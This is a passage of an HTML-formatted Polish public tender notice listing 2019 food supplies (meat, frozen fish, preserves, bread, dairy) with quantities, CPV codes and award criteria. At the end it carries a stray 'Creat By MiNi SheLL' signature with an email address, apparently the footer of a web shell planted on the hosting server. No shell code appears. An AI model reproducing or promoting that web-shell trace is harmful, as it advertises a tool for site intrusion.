PRZETWORY Karkówka wieprzowa b/k surowa kg 300 Łopatka wieprzowa b/k zmielona kg 1100 Mięso gulaszowe krojone w kostkę kg 400 Schab b/k surowy kg 1050 szynka b/k kulka kg 140 Żeberka I klasa kg 110 Filet z kurczaka bez chrząstki świeży kg 1700 Kurczak cały świeży, patroszony, tusza kg 55 Filet z indyka kg 130 Skrzydła z indyka kg 100 Porcje rosołowe świeźe kg 1200 Udo z kurczaka świeźe, surowe bez kości krzyzowej kg 1100 Pałka z kurczaka kg 30 Udziec z kurczaka kg 5 Boczek parzony kg 150 Kieł. biała cieńka delikatesowa 86% miesa kg 3 Kieł. typu farmerska kg 6 Kieł. typu kanapkowa kg 2,6 Kieł. typu słoikowa kg 3 Kieł. typu śląska 90% miesa kg 60 Kieł. typu zielonogórska kg 2 Kieł. typu zwyczajna kg 170 Kiełbaski pieprzowe - cienkie kg 15 Kieł. typu żywiecka kg 22 Kieł. Typu Wiejska kg 2 Łopatka wieprzowa wędlina -73 % mięsa kg 4 Mielonka wieprz. kg 1 Mielonka zapiekana kg 1 Ogonówka parzona kg 25 Parówki cieńkie 85% mięsa kg 90 Polędwica typu sopocka kg 40 Polędwiczka wędzona kg 7 polędwica staropolska kg 8 Salami kg 5 Serdelki kg 30 szynka bamberka 73 % mięsa kg 10 Szynka gotowana kg 40 szynka bez wędzenia 74 % mięsa kg 30 szynka starowiejska kg 8 Szynka konserwowa kg 18 szynka pieczona 73 % mięsa kg 17 szynka polska kg 9 Szynka tyrolska kg 5 szynka wiejska kg 18 szynka wiejska wędzona 99% mięsa kg 12 szynka ze wsi 96,5 % mięsa kg 10 szynka drobiowa 85 % mięsa kg 40 Wędlina drobiowa kg 8 Szynkowa wieprzowa kg 20 Smalec kg 2 Wątrobianka kg 5 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15100000-9, 15131100-6, 15110000-2, 15131500-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>MROŻONKI I RYBY MROŻONE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>MROŻONKI, RYBY MROŻONE, PRZETWORY RYBNE Brokuły mrożone op 2 kg op 110 Brukselka mrożona op 2,5 kg op 70 Fasolka szparagowa cieta op 2,5 op 100 Fasolka żółta cała 2,5kg op 38 Groszek mrożony op 2,5 op 50 Kalafior mrożony op2 kg op 180 Makrela wędzona kg 12 Marchew mrożona op 2,5 kg op 120 Marchew z groszkiem mrożona op 2,5 kg op 149 Marchewka mini 2,5 kg op 150 Mieszanka chińska 450g szt 150 Mieszanka europejska 2,5 kg3 składnikowa (kalafior, brokuł, marchewka) op 80 Matias - śledź solony wiaderko 2kg szt 70 Pyzy drożdżowe op 9 szt op 1300 Wiśnie mrożone op 2,5 kg op 35 Truskawki mrożone op 2,5 kg op 15 Czarna porzeczka 2,5 kg op 2 Malina 2,5 kg op 5 Mieszanka kompotowa op 2,5 kg szt 6 Ryba mrozona mintaj SHP kg 120 Ryba mrożona dorsz SHP kg 230 Ryba mrozona morszczuk SHP kg 200 Ryba mrożona miruna SHP kg 300 Szpinak mrozony op2,5 kg op 21 Włoszczyzna w paski op 2,5 kg op 200 Zupa wiosenna 8 składnikowa op 2,5 kg op 30 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15331100-8, 15229000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>PRZETWORY KONSERWOWE, MĄCZNE, TŁUSZCZE, JAJA, PRZYPRAWY I INNE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PRZETWORY KONSERWOWE, MĄCZNE, PRZYPRAWY, TŁUSZCZE, JAJA Ananas puszka 580g szt 50 Bazylia 10 g szt 40 Budyń bez cukru cykoria(śmietankowy, malinowy, czekoladowy) szt 20 Brzoskwinie puszka 822 g szt 110 Curry 30 g szt 12 Cukier kryształ w oryginalnym opakowaniu op. 1 kg kg 130 Cukier puder 0,4 kg szt 4 Cukier waniliowy 32g szt 45 Cynamon 20 g szt 20 Czosnek mielony 20g szt 35 Chrzan tarty 160 g victus szt 80 Drożdże 100g szt 40 Dżem 220g(słodzony 100% sokiem typu łowicz) szt 420 Estragon 10g szt 5 Fasola ,,Jaś" luz kg 80 Fasola drobna luz na kg kg 110 Fasola czerwona puszka 400 g szt 60 Fasola szparagowa konserwowa 0,7 szt 120 Groszek konserwowy 400g szt 30 groch połówki luz kg 70 Gałka muszkatołowa 15 g szt 15 Galaretka 75 g (truskawkowa, wisniowa, pomarańczowa) szt 70 Herbata granulowana czarna 100g szt 200 herbata owocowa saga 25 torebek (malina, żurawina, pigwa i truskawka) szt 30 herbata mietowa 40 g, 100 % liści mięty pieprzowej szt 4 Imbir 20g szt 10 Jaja L szt 15000 Kakao extra ciemne 100 g szt 70 Kapusta czerwona 0,9 l szt 50 Kapusta naturalnie kiszona bez octu wiaderko 5 kg Wiaderko 130 Kasza wiejska 1 kg szt 380 Kasza jaglana luz kg 60 Kasza gryczana niepalona luz kg 80 Kasza kukurydziana 350 g szt 1 Kaszka manna w oryginalnym opakowaniu 1kg kg 20 Ketchup pikantny 205g słoik (190 g pomidorów na 100g ketchupu) szt 30 Kawa zbozowa 147 g typu anatol szt 25 Ketchup pikantny wyciskany 480g (192g pomidorów na 100g ketchupu szt 190 Kisiel bez cukru 40g szt 150 Kminek 20 g szt 10 kolendra 10 g szt 2 Koncentrat pomidorowy 30% 920g typu Międzychód szt 400 Konserwa rybna - filet z makreli w pomidorach 170g szt 40 Kukurydza konserwowa 400g szt 140 Kurkuma 10 g szt 2 Liść laurowy 80g szt 10 Lubczyk 150 g szt 120 Majeranek 300 g szt 40 Majonez dekoracyjny 700ml typu winiary szt 200 Makaron nitka rosołowa, świderki opakowanie 400g - 100% semolina z pszenicy durum typu sulma szt 500 makaron pełnoziarnisty świderek 400 g szt 60 Makaron drobne muszelki, kolanko, rurki, nitka spagetti, opakowanie 500g-100% semolina z pszenicy durum typu sulma szt 555 Makaron lasagne 500g szt 12 Makaron kokardki 400g szt 15 Makaron wstążki długie, pióra 400 g - 100% semolina z pszenicy durum szt 45 Makaron rurki 500 g szt 20 Mąka wrocławska pszenna TYP 500 w oryginalnych opakowaniach 1kg kg 900 Mąka orkiszowa typ 720 w oryginalnych opakowaniach 1 kg kg 5 Mąka tortowa typ 450 w oryginalnych opakowaniach kg 24 Mąka ziemniaczana 1kg w oryginalnych opakowaniach kg 40 Mąka zytnia typ 720 w oryginalnych opakowaniach kg 3 Mąka ryżowa kg 1 Mąka kukurydziana kg 7 Miód naturalny 1 litr szt 250 Morela suszona 150g bez dodatku cukrów i substancji słodzących szt 2 Musztarda stołowa słoik 200g szt 100 Mus jabłkowy 720 g szt 90 Ocet jabłkowy500ml szt 20 Ocet balsamiczny 250 ml szt 3 Ogórki konserwowe 900g szt 230 Ogórki kwaszone wiaderko 3kg wiaderko 76 Ogórki małosolne 2 kg szt 20 Oregano 10g szt 40 Orzechy włoskie 100g szt 10 Olej butelka 5 l typu kujawska szt 170 Otręby owsiane 150g szt 2 Papryka konserwowa 900ml szt 50 Papryka mielona ostra 20g szt 250 Papryka mielona słodka 20g szt 250 Pasztet drobiowy typu profi szt 80 Proszek do pieczenia 16g szt 6 Pieprz mielony100g szt 110 Płatki kukurydziane250g typu corn flakes szt 100 Płatki bezglutenowe 250g szt 2 płatki owsiane górskie 500g szt 20 Powidła węgierkowe 310g szt 40 Przyprawa do kebabu 30 g szt 20 Przyprawa do szaszłyków 20g szt 15 pestki dyni 100g szt 10 Przyprawa do grila 20g szt 10 Ryż długoziarnisty biały oryginalne opakowanie 1kg szt 480 Ryż naturalny 400g szt 15 Rodzynki 100g szt 80 Rozmaryn 15 g szt 10 Sezam 1 kg kg 15 Siemie lniane 100g szt 1 Śliwki suszone 150 g bez dodatku cukrów i substancji słodzących szt 5 Słonecznik łuskany100g szt 20 sok 100% bez dodatku cukru( jabłkowy, pomarańczowy, multiwitamina, wieloowocowy 2 l) karton 2000 Sok 100 % w kartoniku ze słomką 0,2 szt 150 Sól spożywcza, jodowana op.1kg kg 400 sól sodowo-potasowa 350 g szt 30 Soda 60g szt 1 Tymianek 10 g szt 25 Tuńczyk w oleju 170g w kawałkach szt 40 woda n/g 5 l szt 154 woda n/g 1,5l szt 36 woda n/g mineralna 0,5 l szt 500 Zioła prowansalskie 10 g szt 5 Zaprawa żurek na naturalnym zakwasie 500ml (butelka szklana) szt 200 Ziele angielskie 15g szt 100 Żelatyna 50g szt 10<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, 15830000-5, 15610000-7, 15851100-9, 15872400-5, 15981000-8, 15320000-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>PIECZYWO</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PIECZYWO, CIASTO Bułka mała 60 g szt 8000 Bułka hamburgerowa 120g szt 300 Bułka hot-dog 80g szt 284 Bułka tarta 1 kg kg 380 Chleb wieloziarnisty 500g krojony szt 360 Chleb zwykły 600g krojony szt 1150 Bagietka 30cm szt 30 Kawiorek 350gr krojony szt 200 Drożdżówki 100g, szt 1800 Babka poznańska kg 3 Pierniki kg 3 Rogale kg 6 Makowiec kg 3 Chleb razowy żytni 500g - krojony szt 330 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15811000-6, 15810000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>NABIAŁ</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>NABIAŁ Jogurt owocowy (zawartość cukru do 13,5g/100g) 150g szt 3000 jogurt naturalny 180 g szt 130 jogurt naturalny z ziarnami zbóz 175g szt 130 jogurt naturalny 370 g szt 130 jogurty bezlaktozowe szt 2 Kefir 400g naturalny 2 %tł. szt 59 Masło extra 200g zaw.tłuszcz.82% szt 2760 Mleko 2% pasteryzowane butelka 1 ltr l 630 mleko karton 2 % szt 990 Maślanka typu mrągowska 1 l, (maślanka, mleko, żywe kultury bakterii mlekowych) szt 100 Mleko sojowe 1 l kartonik szt 3 Ser smażony 200g szt 110 ser feta 270 g szt 35 Ser topiony bloczki 100g szt 70 Ser almette 150 g szt 320 Ser kanapkowy 150 g szt 150 ser mascarpone 250g szt 20 ser pleśniowy camembert 120 g szt 60 Serek homogenizowany poznański200g szt 10 Ser mozarella 125 g szt 40 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( salami, gouda) kg 180 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( królewski, rolada ustrzycka) kg 180 Śmietana słodka 12% 0,5 l- kartonik szt 840 Śmietana kremówka 30 % 250 ml-kartonik szt 110 Śmietana zakwaszana 18% 180g szt 300 Gzik Wielkopolski 200 g szt 50 Serek wiejski 150 g typu piątnica szt 170 Twaróg extra śmietankowy mielony kg 630 Twaróg wędzony zaw.tłuszcz.26% kg 11 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15511000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-02<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com